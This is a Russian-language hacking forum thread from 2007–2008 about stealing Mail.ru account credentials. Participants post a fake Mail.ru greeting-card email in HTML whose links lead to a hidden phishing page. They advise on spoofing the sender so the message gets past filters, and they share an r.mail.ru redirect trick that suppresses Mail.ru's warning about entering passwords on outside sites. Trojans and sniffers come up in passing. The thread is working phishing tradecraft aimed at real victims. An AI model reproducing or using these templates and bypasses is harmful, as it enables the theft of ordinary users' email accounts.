Разоблачение http://mai1.pp.ru/ + ещё один общедоступный метод взлома @ mail

Discussion in 'Уязвимости Mail-сервисов' started by Dronga, 25 Feb 2007.

  1. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    Кто нить знает как обойти эту окошку? то что предлагал lmns не катить
     
  2. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Все рботает как говорит lmns, просто заостри внимание на *
     
    1 person likes this.
  3. ufoPlast

    ufoPlast Elder - Старейшина

    Joined:
    24 Feb 2007
    Messages:
    107
    Likes Received:
    52
    Reputations:
    0
    Ребята, только не пинайте сильно. Помогите, я все понял как обойти фильтр и с редиректом понял. НО.
    Что даст переход юзверя на вашу ссылку???
    Что вы юзаете? Пинча со сплоитом??
    Если да, то дайте ссылку пожалуйсто для тех кто в танке по сплоитам (озы их использования в паре с троем).
    Если не это, то подскажите что вы юзаете...
    спасибо. Если чо не так то сорри((
     
    #63 ufoPlast, 24 Nov 2007
    Last edited: 24 Nov 2007
    1 person likes this.
  4. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    www.mai1auth.pp.ru/cpanel
    м?
     
  5. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    Это уже не тупость, это большая лень. Читай первую страницу темы. Как объяснить понятней чем там, я не знаю.
     
  6. ground_zero

    ground_zero Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    398
    Likes Received:
    85
    Reputations:
    5
    Что даст переход юзверя на вашу ссылку???
    мы логоним домен и юзаем снифер =))) иногда помогает =)))
     
  7. Dimo4ka14

    Dimo4ka14 Elder - Старейшина

    Joined:
    23 Dec 2005
    Messages:
    282
    Likes Received:
    117
    Reputations:
    5
    Инетерсная статейка мейлу.ру большой баг)
     
  8. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    уже не работает!
     
  9. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    http://r.mail.ru/clb123456789/antichat.ru
     
    1 person likes this.
  10. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    129
    Likes Received:
    25
    Reputations:
    -1
    PHP:
    <table class="readlet" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
    <
    td id="aj_body">
    <
    div id="let_body">

    </
    div></td><td _base_href="http://win.mail.ru/cgi-bin/readmsg"><a href="http://mail.*****.ru/efafcdb8ee742cf3648b659805b073c9.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">c</a></td>
    <
    td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="100%">
    <
    font color="#000000" face="Arial" size="2">ЗдравствуйтеВам пришла открытка!</font><br>
    <
    font color="#000000" face="Arial" size="2">Чтобы посмотреть открыткунажмите на ссылкурасположенную нижеили скопируйте ее в адресную строку браузера.</font><br>

    <
    font face="Arial" size="2"><b><a href="http://mail.*****.ru/efafcdb8ee742cf3648b659805b073c9.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">http://cards.mail.ru/card.html?cd=eccc9a8ec0282af4362c0eca5bcda811</a></b></font><br><br>
    <font color="#666666" face="Arial" size="1">Открытка будет дожидаться вас в течение 90 дней.</font>

    </
    td>
    </
    tr>
    </
    tbody></table>
    <
    br>
    <
    hr bgcolor="#D9D9D9" noshade="noshade">

    <
    table _base_href="http://win.mail.ru/cgi-bin/readmsg" border="0" cellpadding="0" cellspacing="0" width="100%">
    <
    tbody _base_href="http://win.mail.ru/cgi-bin/readmsg"><tr _base_href="http://win.mail.ru/cgi-bin/readmsg"><td _base_href="http://win.mail.ru/cgi-bin/readmsg">




    <
    font color="#666666" face="Arial" size="1">Открытки к праздникам</font>
    <
    table _base_href="http://win.mail.ru/cgi-bin/readmsg" border="0" width="100%">
    <
    tbody _base_href="http://win.mail.ru/cgi-bin/readmsg"><tr _base_href="http://win.mail.ru/cgi-bin/readmsg" align="center" valign="top">

    <
    td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82163&amp;S=&amp;tid=7636" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/98ee7292c19d0dd8bc8b082dbcd88f61.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82163" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">День рождения</a></font></td>


    <
    td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82421&amp;S=&amp;tid=7379" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/afe9124378c9df06ec45e59e86899c3c.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82421" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">На каждый день</a></font></td>


    <
    td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82064&amp;S=&amp;tid=7388" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/ccd109545010520c6e8f0065ddc85820.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82064" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> &nbsp;
    Пожелания</a></font></td>

    <
    td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"></td>
    </
    tr>

    </
    tbody></table>










    <
    font color="#666666" face="Arial" size="1">Чтобы своевременно узнавать о праздникахименинах и конкурсах, <a href="http://content.mail.ru/cgi-bin/subscribe.cgi?list_id=782&amp;list_id=26785" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">подпишитесь на рассылку</a>.</font>

    </
    td></tr>
    </
    tbody></table>

    <
    hr bgcolor="#D9D9D9" noshade="noshade">

    <
    font color="#666666" face="Arial" size="2"><b><img src="http://*****.ru/img5.gif" alt="" valign="absmiddle" border="0" height="17" width="17"> <a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">Открытки@Mail.Ru</a>&nbsp;– открытки на все случаи жизни!</b></font><br><br><br>
    раньше всегда пользовался этим фековым письмом, но теперь почемуто когда отправляю его, то оно не доходит. почему?
     
    #70 КИНГ, 1 Apr 2008
    Last edited: 1 Apr 2008
  11. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    а ты его случайно не от лица администрации отправляешь (какой ящик вписываешь в поле "от кого")? Если что то типа "Администрация Mail.Ru" бла бла бла, то поменяй на другое, а то письма отправленные от "админов" блочаться.
     
    #71 Grey, 1 Apr 2008
    Last edited: 1 Apr 2008
  12. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    129
    Likes Received:
    25
    Reputations:
    -1
    раньше (до вчерашнего) дня отсылал от Открытки@Mail.ru все ок приходило. сегодня обнаружил что письма не доходят. стал от обычных отправлять, но и они не доходят! в чем же проблема?
     
  13. stalles

    stalles Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    107
    Likes Received:
    19
    Reputations:
    -3

    приходит вот так
    Открытки Mail.Ru <са[email protected]>
     
    1 person likes this.
  14. КИНГ

    КИНГ Elder - Старейшина

    Joined:
    13 Jun 2006
    Messages:
    129
    Likes Received:
    25
    Reputations:
    -1
    stalles


    покажи свой пример письма
     
  15. opy495

    opy495 Member

    Joined:
    23 Mar 2008
    Messages:
    37
    Likes Received:
    6
    Reputations:
    -5
    прочел всю тему но не понел...
    подкиньте плз нормальный прмер как скрыть урл...

    и ешё , как жертве отправить точно такое же письмо?

    [​IMG]
     
  16. MegaZLO

    MegaZLO Elder - Старейшина

    Joined:
    8 Sep 2005
    Messages:
    8
    Likes Received:
    22
    Reputations:
    0
    2КИНГ

    у меня доходила эта хтмл, только почему то теперь когда открываю письмо для просмотра то у меня выдает код хтмл вместо визуального отображения =(

    т.е.
    <table class="readlet" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
    <td id="aj_body"> и тд

    З.Ы. не могу понять почему не отображает =(
     
  17. opy495

    opy495 Member

    Joined:
    23 Mar 2008
    Messages:
    37
    Likes Received:
    6
    Reputations:
    -5
    народ а вот вы посылаете эти фейк открытки с ссылкой на фейк страницу , по которой должна пройти жертва и ввести свой логин пас , но как только жертва жмет на вашу ссылку , вылазиет сообшение : Вы собираетесь пеерйти на сайт www.blabla.ru Никогда не вводите пароль от своего вочтового ящика на посторонних ресурсах.

    Эта надпись срезает процентов пятьдесят жерт которые уже не поведуца на развод...
    нада как то бороца с этой фишкой от мейла
     
  18. opy495

    opy495 Member

    Joined:
    23 Mar 2008
    Messages:
    37
    Likes Received:
    6
    Reputations:
    -5
    кому интересно решил проблему с выеб**м mail.ru теперь не пишет типа Вы собираетесь пеерйти на сайт www.blabla.ru Никогда не вводите пароль от своего вочтового ящика на посторонних ресурсах.

    для этого используем:

    PHP:
    <a href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/ВАШ САЙТ" target="_blank">http://cards.mail.ru/card.html?cd=30dc79c7f966e8032cbd8c2ada48e6ad</a></font><br